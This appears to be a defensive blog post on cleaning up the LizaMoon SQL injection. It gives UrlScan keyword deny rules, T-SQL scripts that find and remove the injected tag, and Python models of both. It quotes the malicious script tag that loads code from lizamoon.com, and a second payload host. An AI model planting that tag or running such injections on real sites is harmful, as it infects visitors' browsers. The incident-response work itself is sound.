Edit3: Currently testing the following UrlScan SQL injection blocking rules:

I don’t have time to fix the WordPress syntax issues, so I’m posting the code on Pastebin also:

CODE ALSO HERE http://pastebin.com/y40r6X6J

<pre>
; urlscan.ini: a rule only runs if its section name is listed in [RuleList]
[RuleList]
RuleList=SQL Injection,SQL Injection Headers

[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=1
; ScanHeaders takes header names (e.g. Cookie:), not a rule name; the Cookie: header is covered by the second rule
ScanHeaders=

[SQL Injection Strings]
--
%3b ; a semicolon
/*
@ ; also catches @@
char ; also catches nchar and varchar
alter
begin
cast
convert
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
kill
open
select
sys ; also catches sysobjects and syscolumns
table

[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanUrl=0
ScanAllRaw=0
ScanQueryString=0
ScanHeaders=Cookie:

[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
cast
convert
declare
delete
drop
exec ; also catches execute
fetch
insert
kill
select
</pre>
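To see what a deny list like this would actually reject before enabling it, here is an added Python model of the rule matching (example code written for this post, not UrlScan itself and not the author's code). It parses a trimmed copy of the rule fragment above in its ini syntax and runs constructed sample requests through it. The function names (`parse_ini`, `load_rules`, `check_request`) and the sample requests are made up here; the model assumes that a DenyDataSection entry matches as a case-insensitive substring of the scanned field, that fields are compared as sent (no %-unescaping, which is why %3b is listed explicitly), that AppliesTo is checked against the path extension, and that ScanHeaders names the headers to scan; ScanAllRaw is not modelled.

```python
# Offline model of the post's UrlScan 3.1 rules (added example, not UrlScan code).
# Assumed semantics: case-insensitive substring match on the raw field, AppliesTo
# tested against the path extension, ScanHeaders = header names with their colon.

# Trimmed copy of the rule fragment from the post, with both rules named in RuleList.
RULES_INI = """\
[RuleList]
RuleList=SQL Injection,SQL Injection Headers

[SQL Injection]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Strings
ScanQueryString=1
ScanHeaders=

[SQL Injection Strings]
--
%3b ; a semicolon
@ ; also catches @@
declare
open
select
table

[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
ScanQueryString=0
ScanHeaders=Cookie:

[SQL Injection Headers Strings]
--
declare
insert
select
"""

def parse_ini(text):
    """urlscan.ini reader: [section] lines, ';' starts a comment, blank lines ignored."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(';', 1)[0].strip()
        if not line:
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections

def _kv(lines):
    return {k.strip(): v.strip() for k, _, v in (ln.partition('=') for ln in lines)}

def _csv(value):
    return [p.strip().lower() for p in value.split(',') if p.strip()]

def load_rules(text):
    """Resolve RuleList into rule dicts; a rule section not named in RuleList is inactive."""
    sec = parse_ini(text)
    rules = []
    for name in (n.strip() for n in _kv(sec['RuleList'])['RuleList'].split(',')):
        cfg = _kv(sec[name])
        rules.append({
            'name': name,
            'exts': tuple(_csv(cfg['AppliesTo'])),
            'deny': [s.lower() for s in sec[cfg['DenyDataSection']]],
            'scan_url': cfg.get('ScanUrl') == '1',
            'scan_qs': cfg.get('ScanQueryString') == '1',
            'headers': _csv(cfg.get('ScanHeaders', '')),   # e.g. ['cookie:']
        })
    return rules

RULES = load_rules(RULES_INI)

def check_request(path, query, headers, rules=RULES):
    """(rule name, deny string) for the first rule that would reject the request, else None."""
    hdrs = {k.lower().rstrip(':') + ':': v for k, v in headers.items()}
    for r in rules:
        if not path.lower().endswith(r['exts']):
            continue
        fields = ([path] if r['scan_url'] else []) + ([query] if r['scan_qs'] else [])
        fields += [hdrs.get(h, '') for h in r['headers']]
        for low in (f.lower() for f in fields):
            for s in r['deny']:
                if s in low:
                    return r['name'], s
    return None

if __name__ == '__main__':
    # Constructed sample requests: (path, query string, headers)
    for p, q, h in [
        ('/products.aspx', 'id=42', {}),
        ('/products.aspx', 'id=42%3bDECLARE', {}),                     # raw %3b, case-insensitive
        ('/search.aspx', 'q=open+table+layout', {}),                    # ordinary words, still denied
        ('/account.aspx', '', {'Cookie': 'session=abc; pref=select'}),  # second rule, Cookie: only
        ('/docs/page.html', 'id=1--', {}),                              # .html is outside AppliesTo
    ]:
        print(p, q, h, '->', check_request(p, q, h))
```

The third sample is the point to watch: bare words such as open, table, end and sys will also hit ordinary query strings, so replay a day of real IIS traffic through the list and check the rejects before enabling it on a production site.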

Edit2: I am now seeing injections using hxxp://t6ryt56.info/ur.php as the URL instead of lizamoon.

Edit: I’m still working out the WordPress code issues. A lot has been appended that should not be in the code below (<span> tags etc.); will fix soon.

Great information is located here; Websense appears to be keeping pretty up to date on it:

http://community.websense.com/blogs/securitylabs/archive/2011/03/29/lizamoon-mass-injection-28000-urls-including-itunes.aspx


I have a feeling that this Lizamoon.com inject will be getting around quite a bit.

Here are the steps I took to clean up post-injection (tested on SQL2k5). CODE ALSO HERE: http://pastebin.com/M3BmePWC

1. I wanted an easy way to track down every instance of a keyword in EVERY column and table. I used this stored procedure:

<pre>
CREATE PROC FindAll
(
    @SearchStr nvarchar(100)
)
AS
BEGIN
    -- Collects (schema.table.column, value) for every character column containing @SearchStr
    CREATE TABLE #Results (ColumnName nvarchar(370), ColumnValue nvarchar(3630))

    SET NOCOUNT ON

    DECLARE @TableName nvarchar(256), @ColumnName nvarchar(128), @SearchStr2 nvarchar(110)
    SET @TableName = ''
    -- Wraps the search term as a quoted '%term%' literal for the dynamic LIKE below
    SET @SearchStr2 = QUOTENAME('%' + @SearchStr + '%','''')

    -- Walk the user tables in name order (MIN(...) > previous acts as a cursor-free loop)
    WHILE @TableName IS NOT NULL
    BEGIN
        SET @ColumnName = ''
        SET @TableName =
        (
            SELECT MIN(QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME))
            FROM    INFORMATION_SCHEMA.TABLES
            WHERE   TABLE_TYPE = 'BASE TABLE'
                AND QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) > @TableName
                AND OBJECTPROPERTY(
                        OBJECT_ID(
                            QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME)
                             ), 'IsMSShipped'
                               ) = 0
        )

        -- Then walk that table's char/varchar/nchar/nvarchar columns
        WHILE (@TableName IS NOT NULL) AND (@ColumnName IS NOT NULL)
        BEGIN
            SET @ColumnName =
            (
                SELECT MIN(QUOTENAME(COLUMN_NAME))
                FROM    INFORMATION_SCHEMA.COLUMNS
                WHERE   TABLE_SCHEMA    = PARSENAME(@TableName, 2)
                    AND TABLE_NAME  = PARSENAME(@TableName, 1)
                    AND DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar')
                    AND QUOTENAME(COLUMN_NAME) > @ColumnName
            )

            IF @ColumnName IS NOT NULL
            BEGIN
                INSERT INTO #Results
                EXEC
                (
                    'SELECT ''' + @TableName + '.' + @ColumnName + ''', LEFT(' + @ColumnName + ', 3630)
                    FROM ' + @TableName + ' (NOLOCK) ' +
                    ' WHERE ' + @ColumnName + ' LIKE ' + @SearchStr2
                )
            END
        END
    END

    SELECT ColumnName, ColumnValue FROM #Results
END
</pre>

Run it with the following query:

<pre>
EXEC FindAll 'lizamoon'
</pre>

2. Now that we know what we’re working against, find the injected string and replace it with an empty string (this will not affect anything outside of the string). CODE ALSO HERE: http://pastebin.com/cJ1SWaKh

<pre>
SET NOCOUNT ON

DECLARE @stringToFind VARCHAR(100)
DECLARE @stringToReplace VARCHAR(100)
DECLARE @schema sysname
DECLARE @table sysname
DECLARE @count INT
DECLARE @sqlCommand VARCHAR(8000)
DECLARE @where VARCHAR(8000)
DECLARE @columnName sysname
DECLARE @object_id INT

-- The injected tag exactly as it sits in the data; replacing it with '' strips it out
SET @stringToFind = '</title><script src=http://lizamoon.com/ur.php></script>'
SET @stringToReplace = ''

-- Outer cursor: every user table
DECLARE TAB_CURSOR CURSOR FOR
SELECT   B.NAME      AS SCHEMANAME,
         A.NAME      AS TABLENAME,
         A.OBJECT_ID
FROM     sys.objects A
INNER JOIN sys.schemas B
    ON A.SCHEMA_ID = B.SCHEMA_ID
WHERE    TYPE = 'U'
ORDER BY 1

OPEN TAB_CURSOR
FETCH NEXT FROM TAB_CURSOR INTO @schema, @table, @object_id

WHILE @@FETCH_STATUS = 0
BEGIN
    -- Inner cursor: the table's non-computed character columns
    DECLARE COL_CURSOR CURSOR FOR
    SELECT A.NAME
    FROM   sys.columns A
    INNER JOIN sys.types B
        ON A.SYSTEM_TYPE_ID = B.SYSTEM_TYPE_ID
    WHERE  OBJECT_ID = @object_id
       AND IS_COMPUTED = 0
       AND B.NAME IN ('char','nchar','nvarchar','varchar','text','ntext')

    OPEN COL_CURSOR
    FETCH NEXT FROM COL_CURSOR INTO @columnName

    WHILE @@FETCH_STATUS = 0
    BEGIN
        -- Identifiers go through QUOTENAME so unusual table/column names cannot break the dynamic SQL
        SET @sqlCommand = 'UPDATE ' + QUOTENAME(@schema) + '.' + QUOTENAME(@table)
            + ' SET ' + QUOTENAME(@columnName) + ' = REPLACE(CONVERT(nvarchar(max), ' + QUOTENAME(@columnName) + '),'''
            + @stringToFind + ''',''' + @stringToReplace + ''')'
        -- Only touch rows that actually contain the string
        SET @where = ' WHERE ' + QUOTENAME(@columnName) + ' LIKE ''%' + @stringToFind + '%'''
        EXEC( @sqlCommand + @where)
        SET @count = @@ROWCOUNT
        IF @count > 0
        BEGIN
            PRINT @sqlCommand + @where
            PRINT 'Updated: ' + CONVERT(VARCHAR(10), @count)
            PRINT '----------------------------------------------------'
        END
        FETCH NEXT FROM COL_CURSOR INTO @columnName
    END

    CLOSE COL_CURSOR
    DEALLOCATE COL_CURSOR
    FETCH NEXT FROM TAB_CURSOR INTO @schema, @table, @object_id
END

CLOSE TAB_CURSOR
DEALLOCATE TAB_CURSOR
</pre>
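The two scripts above are really one routine: locate the injected string in every character column, then replace it only where it occurs. As an added example (not the post's code, and written against SQLite through Python's sqlite3 module so it runs offline anywhere, rather than against SQL Server), here is the same locate-then-replace routine generalised a little: it escapes LIKE wildcards in the search string so it is matched literally, counts hits per column first so the result can be reviewed as a dry run, and performs all the updates in one transaction that rolls back if anything fails. The function names (`find_all`, `scrub`, `sample_db`), the tables and the rows are constructed for the example; the injected tag is the same string the post's script removes.

```python
import sqlite3

# Constructed: the injected tag the post strips out (same string as its T-SQL script).
INJECTED = '</title><script src=http://lizamoon.com/ur.php></script>'
ESC = '\\'   # LIKE ... ESCAPE '\' so %, _ and \ in the search string are taken literally

def like_escape(s):
    """Escape LIKE metacharacters so the search string is matched as plain text."""
    for ch in (ESC, '%', '_'):
        s = s.replace(ch, ESC + ch)
    return s

def string_columns(conn, table):
    """Names of the table's character columns (PRAGMA table_info stands in for sys.columns/sys.types)."""
    rows = conn.execute(f"PRAGMA table_info('{table}')").fetchall()
    return [r[1] for r in rows
            if 'CHAR' in (r[2] or '').upper() or 'TEXT' in (r[2] or '').upper()]

def find_all(conn, needle):
    """Step 1 generalised: (table, column, matching rows) for every string column containing needle."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite!_%' ESCAPE '!'")]
    pattern = '%' + like_escape(needle) + '%'
    hits = []
    for t in tables:
        for c in string_columns(conn, t):
            n = conn.execute(f"""SELECT COUNT(*) FROM "{t}" WHERE "{c}" LIKE ? ESCAPE '{ESC}'""",
                             (pattern,)).fetchone()[0]
            if n:
                hits.append((t, c, n))
    return hits

def scrub(conn, needle, replacement=''):
    """Step 2: REPLACE needle only in rows that contain it, every column in one transaction.

    Returns {(table, column): rows changed}; an exception rolls all the updates back."""
    pattern = '%' + like_escape(needle) + '%'
    changed = {}
    with conn:   # commit at the end, rollback on error
        for t, c, _ in find_all(conn, needle):
            cur = conn.execute(
                f"""UPDATE "{t}" SET "{c}" = REPLACE("{c}", ?, ?) WHERE "{c}" LIKE ? ESCAPE '{ESC}'""",
                (needle, replacement, pattern))
            changed[(t, c)] = cur.rowcount
    return changed

def sample_db():
    """Constructed in-memory database with the injected tag appended to a few string values."""
    conn = sqlite3.connect(':memory:')
    conn.executescript(f"""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name NVARCHAR(100), descr TEXT);
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title VARCHAR(200), hits INTEGER);
        INSERT INTO products VALUES (1, 'Widget', 'A fine widget'),
                                    (2, 'Gadget{INJECTED}', 'Gadget{INJECTED}'),
                                    (3, 'Gizmo', 'A gizmo{INJECTED}');
        INSERT INTO pages VALUES (1, 'Home{INJECTED}', 10), (2, 'About', 3);
    """)
    return conn

if __name__ == '__main__':
    db = sample_db()
    print('before:', find_all(db, INJECTED))   # dry run: review this before touching data
    print('changed:', scrub(db, INJECTED))
    print('after:', find_all(db, INJECTED))
```

The dry run matters more than it looks: the post's script updates in place as it goes, so a search string that happened to contain a LIKE wildcard (`%`, `_` or `[` on SQL Server) would both over-match and silently rewrite rows it should not have touched. Escaping the needle and reviewing the hit counts first keeps the cleanup to exactly the injected rows.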

 
